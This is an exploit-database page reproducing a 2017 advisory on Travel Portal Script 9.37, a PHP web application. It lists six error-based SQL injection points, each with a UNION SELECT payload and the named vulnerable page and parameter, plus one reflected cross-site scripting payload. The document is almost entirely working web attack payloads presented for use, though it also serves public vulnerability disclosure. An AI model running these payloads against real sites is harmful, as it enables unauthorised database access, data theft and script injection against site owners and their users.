Advertisement






Travel Portal Script 9.37 Cross Site Scripting / SQL Injection

CVE Category Price Severity
Unavailable High
Author Risk Exploitation Type Date
Unknown High Remote 2017-02-24
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017020231

Below is a copy:

Travel Portal Script 9.37 Cross Site Scripting / SQL InjectionExploit Title : Travel Portal Script v9.37 - Multiple Vulnerability
Google Dork :    -
Date : 23/02/2017
Exploit Author : Marc Castejon <[email protected]>
Vendor Homepage : http://itechscripts.com/travel-portal-script/
Software Link: http://travel.itechscripts.com/
Type : webapps
Platform: PHP
Version: 4.29
Sofware Price and Demo : $250


------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/holiday.php
Vulnerable Parameters: hid
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf

------------------------------------------------

Type: Reflected XSS
Vulnerable URL:http://localhost/[PATH]/holiday.php
Vulnerable Parameters: hid
Method: GET
Payload: "/><img src=i onerror=prompt(1)>

------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/pages.php
Vulnerable Parameters: id
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf

-------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/content.php
Vulnerable Parameters: id
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf

-------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/hotel.php
Vulnerable Parameters: id
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf

-------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/holiday_book.php
Vulnerable Parameters: hid
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf

------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/admin/airline-edit.php
Vulnerable Parameters: fid
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf

------------------------------------------------


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum